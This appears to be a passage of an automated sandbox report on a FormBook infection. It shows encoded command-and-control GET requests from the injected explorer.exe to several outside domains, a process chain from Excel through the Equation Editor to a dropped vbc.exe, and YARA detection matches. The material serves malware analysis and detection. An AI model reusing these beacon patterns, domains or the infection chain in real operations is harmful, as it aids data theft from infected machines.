Nov 26, 2020 21:23:30.736526012 CET	527	OUT	GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=jNDZ6p/mqvXz+lV8Z3ikV5w1yZNnar/gT18SrTzuUceB+Xpt3Ns987IJweZa7faZLQZG0w== HTTP/1.1 Host: www.myecovet.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:23:30.852283001 CET	528	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 26 Nov 2020 20:23:30 GMT Content-Type: text/html Content-Length: 275 ETag: "5fb7c9ca-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	104.130.255.68	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:23:36.179626942 CET	529	OUT	GET /coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1 Host: www.snhdt.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:23:36.311877966 CET	529	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.10.3 Content-Type: text/html Date: Thu, 26 Nov 2020 20:23:36 GMT Location: https://www.snhdt.net/coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh Connection: close Content-Length: 185 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.10.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49168	154.215.9.186	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:23:41.920305014 CET	530	OUT	GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=GKk2d32OHEJliZV7lc1R0hFu4AxFv3Wk4g8o+d/QQJC2fTrUsNVYmPem7KfYQyXD+5gDrQ== HTTP/1.1 Host: www.kapkwata.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:23:42.188966036 CET	530	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Thu, 26 Nov 2020 20:23:41 GMT Connection: close Data Raw: 33 0d 0a ef bb bf 0d 0a Data Ascii: 3
Nov 26, 2020 21:23:42.189013958 CET	531	IN	Data Raw: 35 62 0d 0a e5 bd 93 e5 89 8d e5 9f 9f e5 90 8d e6 88 96 e8 80 85 e7 ab af e5 8f a3 e6 9c aa e7 bb 91 e5 ae 9a 2c e8 af b7 e5 88 b0 e5 90 8e e5 8f b0 e7 bb 91 e5 ae 9a ef bc 8c e8 af a5 e6 b6 88 e6 81 af e5 8f af e4 bb a5 e5 9c a8 e5 90 8e e5 8f Data Ascii: 5b,
Nov 26, 2020 21:23:42.189059973 CET	531	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49169	101.100.209.140	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:23:47.764637947 CET	531	OUT	GET /coz3/?MPxhwJ=aFYZso2mvNEUZnS9j6THNTuqPDrOfInARvQYZFtdg9PpX/64PIjCzIwYqotU8KZChZyPAA==&Nxl0wV=htxXA6k0ApBh HTTP/1.1 Host: www.penrosecondos-official.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:23:49.936259031 CET	532	IN	HTTP/1.1 404 Not Found Date: Thu, 26 Nov 2020 20:23:47 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.penrosecondos-official.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2 Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Nov 26, 2020 21:23:49.936305046 CET	533	IN	Data Raw: 31 66 34 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 Data Ascii: 1f40<!DOCTYPE html><html lang="en-US" class="no-js"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detectio
Nov 26, 2020 21:23:49.936330080 CET	535	IN	Data Raw: 20 20 20 20 20 20 20 20 77 66 2e 61 73 79 6e 63 20 3d 20 27 74 72 75 65 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 Data Ascii: wf.async = 'true'; var s = document.getElementsByTagName( 'script' )[0]; s.parentNode.insertBefore( wf, s ); })(); </sc
Nov 26, 2020 21:23:49.936352968 CET	536	IN	Data Raw: 6c 22 20 74 69 74 6c 65 3d 22 50 65 6e 72 6f 73 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 6e 72 6f 73 65 63 6f 6e 64 6f 73 2d 6f 66 66 69 63 69 61 6c 2e 63 6f 6d 2f 66 65 65 64 2f Data Ascii: l" title="Penrose » Feed" href="https://www.penrosecondos-official.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Penrose » Comments Feed" href="https://www.penrosecondos-official.com/comments/feed/" /><sc
Nov 26, 2020 21:23:49.936373949 CET	537	IN	Data Raw: 32 38 2c 35 36 34 34 37 5d 29 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 63 28 5b 35 35 33 35 37 2c 35 36 34 32 34 2c 38 32 30 35 2c 35 35 33 35 36 2c 35 37 32 31 32 5d 2c 5b 35 35 33 35 37 2c 35 36 34 32 34 2c 38 32 30 33 2c Data Ascii: 28,56447]));case"emoji":return!c([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}fo
Nov 26, 2020 21:23:49.936397076 CET	539	IN	Data Raw: 74 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 Data Ascii: t;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://www.penrosecondos-official.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' type='text/css' medi
Nov 26, 2020 21:23:49.936419964 CET	540	IN	Data Raw: 73 65 63 6f 6e 64 6f 73 2d 6f 66 66 69 63 69 61 6c 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 64 66 6c 69 70 2f 61 73 73 65 74 73 2f 63 73 73 2f 74 68 65 6d 69 66 79 2d 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 Data Ascii: secondos-official.com/wp-content/plugins/dflip/assets/css/themify-icons.min.css?ver=1.5.18' type='text/css' media='all' /><link rel='stylesheet' id='dflip-style-css' href='http://www.penrosecondos-official.com/wp-content/plugins/dflip/assets
Nov 26, 2020 21:23:49.936438084 CET	542	IN	Data Raw: 31 66 34 30 0d 0a 69 61 6c 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 72 61 70 6b 69 74 2f 66 72 61 6d 65 77 6f 72 6b 2f 63 73 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 6d 69 6e 2e 63 73 73 3f 76 65 Data Ascii: 1f40ial.com/wp-content/themes/wrapkit/framework/css/perfect-scrollbar.min.css?ver=5.5.3' type='text/css' media='all' /><link rel='stylesheet' id='animate-css' href='http://www.penrosecondos-official.com/wp-content/themes/wrapkit/framework/
Nov 26, 2020 21:23:49.936455011 CET	543	IN	Data Raw: 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 73 64 5f 74 68 65 6d 65 5f 66 6f 6e 74 73 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 Data Ascii: ><link rel='stylesheet' id='sd_theme_fonts-css' href='https://fonts.googleapis.com/css?family=Montserrat:300,400,500,700&subset' type='text/css' media='all' /><link rel='stylesheet' id='bsf-Defaults-css' href='http://www.penrosecondos
Nov 26, 2020 21:23:49.936471939 CET	545	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 6e 72 6f 73 65 63 6f 6e 64 6f 73 2d 6f 66 66 69 63 69 61 6c 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 45 64 69 74 55 52 49 22 20 74 79 70 65 3d Data Ascii: href="https://www.penrosecondos-official.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.penrosecondos-official.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49170	74.220.199.6	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:23:54.112483978 CET	545	OUT	GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ== HTTP/1.1 Host: www.teleeducationforafghanistan.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:23:54.282465935 CET	547	IN	HTTP/1.1 200 OK Date: Thu, 26 Nov 2020 20:23:54 GMT Server: Apache/2.2.31 (CentOS) Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=ISO-8859-1 Data Raw: 31 32 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 65 6c 65 65 64 75 63 61 74 69 6f 6e 66 6f 72 61 66 67 68 61 6e 69 73 74 61 6e 2e 63 6f 6d 20 2d 20 42 6c 75 65 48 6f 73 74 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 62 6c 75 65 68 6f 73 74 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 69 6e 66 6f 2f 69 6e 64 65 78 2f 5f 62 68 2f 68 6f 6d 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 62 6c 75 65 68 6f 73 74 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 62 68 2f 6d 61 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 6c 75 65 68 6f 73 74 20 2d 20 54 6f 70 20 72 61 74 65 64 20 77 65 62 20 68 6f 73 74 69 6e 67 20 70 72 6f 76 69 64 65 72 20 2d 20 46 72 65 65 20 31 20 63 6c 69 63 6b 20 69 6e 73 74 61 6c 6c 73 20 46 6f 72 20 62 6c 6f 67 73 2c 20 73 68 6f 70 70 69 6e 67 20 63 61 72 74 73 2c 20 61 6e 64 20 6d 6f 72 65 2e 20 47 65 74 20 61 20 66 72 65 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 2c 20 72 65 61 6c 20 4e 4f 4e 2d 6f 75 74 73 6f 75 72 63 65 64 20 32 34 2f 37 20 73 75 70 70 6f 72 74 2c 20 61 6e 64 20 73 75 70 65 72 69 6f 72 20 73 70 65 65 64 2e 20 77 65 62 20 68 6f 73 74 69 6e 67 20 70 72 6f 76 69 64 65 72 20 70 68 70 20 68 6f 73 74 69 6e 67 20 63 68 65 61 70 20 77 65 62 20 68 6f 73 74 69 6e 67 2c 20 57 65 62 20 68 6f 73 74 69 6e 67 2c 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 2c 20 66 72 6f 6e 74 20 70 61 67 65 20 68 6f 73 74 69 6e 67 2c 20 65 6d 61 69 6c 20 68 6f 73 74 69 6e 67 2e 20 20 57 65 20 6f 66 66 65 72 20 61 66 66 6f 72 64 61 62 6c 65 20 68 6f 73 74 69 6e 67 2c 20 77 65 62 20 68 6f 73 74 69 6e 67 20 70 72 6f 76 69 64 65 72 20 62 75 73 69 6e 65 73 73 20 77 65 62 20 68 6f 73 74 69 6e 67 2c 20 65 63 6f 6d 6d 65 72 63 65 20 68 6f 73 74 69 6e 67 2c 20 75 6e 69 78 20 68 6f 73 74 69 6e 67 2e 20 20 50 68 6f 6e 65 20 73 75 70 70 6f 72 74 20 61 76 61 69 6c 61 62 6c 65 2c 20 46 72 65 65 20 44 6f 6d 61 69 6e 2c 20 61 6e 64 20 46 72 65 65 20 53 65 74 75 70 2e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 20 68 6f 73 74 69 6e 67 2c 20 70 72 6f 76 69 64 65 72 2c 20 70 68 70 20 68 6f 73 74 69 6e 67 2c 77 65 62 20 68 6f 73 74 69 6e 67 2c 20 66 72 65 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 2c 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 2c 20 66 72 6f 6e 74 20 70 61 67 65 20 68 6f 73 74 69 6e 67 2c 20 77 65 62 20 73 69 Data Ascii: 12a8<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><meta http-equiv="Content-type" content="text/html;charset=UTF-8" /><title>Welcome teleeducationforafghanistan.com - BlueHost.com</title><link rel="stylesheet" href="//www.bluehost.com/media/shared/info/index/_bh/home.css" type="text/css" /><link rel="stylesheet" href="//www.bluehost.com/media/shared/general/_bh/main.css" type="text/css" /><meta name="description" content="Bluehost - Top rated web hosting provider - Free 1 click installs For blogs, shopping carts, and more. Get a free domain name, real NON-outsourced 24/7 support, and superior speed. web hosting provider php hosting cheap web hosting, Web hosting, domain names, front page hosting, email hosting. We offer affordable hosting, web hosting provider business web hosting, ecommerce hosting, unix hosting. Phone support available, Free Domain, and Free Setup." /><meta name="keywords" content="web hosting, provider, php hosting,web hosting, free domain names, domain name, front page hosting, web si
Nov 26, 2020 21:23:54.282515049 CET	548	IN	Data Raw: 74 65 2c 20 77 65 62 20 64 65 73 69 67 6e 2c 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 72 65 67 69 73 74 72 61 74 69 6f 6e 2c 20 62 75 73 69 6e 65 73 73 20 77 65 62 20 73 69 74 65 2c 20 77 65 62 20 73 69 74 65 20 68 6f 73 74 69 6e 67 2c 20 77 65 62 Data Ascii: te, web design, domain name registration, business web site, web site hosting, web space, picture hosting, small business, cheap web hosting, webmaster, web site builder, web space, affordable web hosting, marketing, cgi perl php hosting, blog
Nov 26, 2020 21:23:54.282556057 CET	550	IN	Data Raw: 62 72 20 2f 3e 57 65 62 20 48 6f 73 74 69 6e 67 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 68 31 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 63 6f 6e 74 61 69 6e 65 72 22 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a Data Ascii: br />Web Hosting Solutions</h1><a class="login_container" style='text-decoration: none; font-weight: bold;color:#FFF;width:inherit; font-size: 12px;width: auto;' href="http://www.bluehost.com/" rel="nofollow">Web Hosting - courtesy of www.blu
Nov 26, 2020 21:23:54.282591105 CET	551	IN	Data Raw: 6d 65 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 0a 3c 68 72 20 63 6c 61 73 73 3d 22 62 62 61 72 22 20 2f 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 21 2d 2d 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 Data Ascii: me></center><hr class="bbar" /></div></div>... class="content" --><div class="frame_c frame_br"></div><div class="frame_c frame_bl"></div></div>... class="frame center" --><div id="footer"><center> <ul class="footer_links">

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49171	198.101.172.217	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:23:59.706502914 CET	551	OUT	GET /coz3/?MPxhwJ=r7KW2tdRwlRuK7ncHXLiovSXqLjDerMq8ItDnZvkA+2BRQOB5Pe97gh02v96lMs3N6IAbw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1 Host: www.thevirginiahomesource.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:23:59.829381943 CET	552	IN	HTTP/1.0 302 Moved Temporarily Location: https://www.thevirginiahomesource.com/coz3/?MPxhwJ=r7KW2tdRwlRuK7ncHXLiovSXqLjDerMq8ItDnZvkA+2BRQOB5Pe97gh02v96lMs3N6IAbw==&Nxl0wV=htxXA6k0ApBh Server: BigIP Connection: close Content-Length: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1476 Parent PID: 584

General

Start time:	21:21:39
Start date:	26/11/2020
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f2c0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2516 Parent PID: 584

General

Start time:	21:21:59
Start date:	26/11/2020
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2824 Parent PID: 2516

General

Start time:	21:22:01
Start date:	26/11/2020
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xb80000
File size:	498176 bytes
MD5 hash:	DA5CE3FE1991B9ACEF3B0BEEC210EE9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2139267535.00000000025FE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2844 Parent PID: 2824

General

Start time:	21:22:04
Start date:	26/11/2020
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xb80000
File size:	498176 bytes
MD5 hash:	DA5CE3FE1991B9ACEF3B0BEEC210EE9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2844

General

Start time:	21:22:05
Start date:	26/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: svchost.exe PID: 2380 Parent PID: 1388

General

Start time:	21:22:24
Start date:	26/11/2020
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0x720000
File size:	20992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident 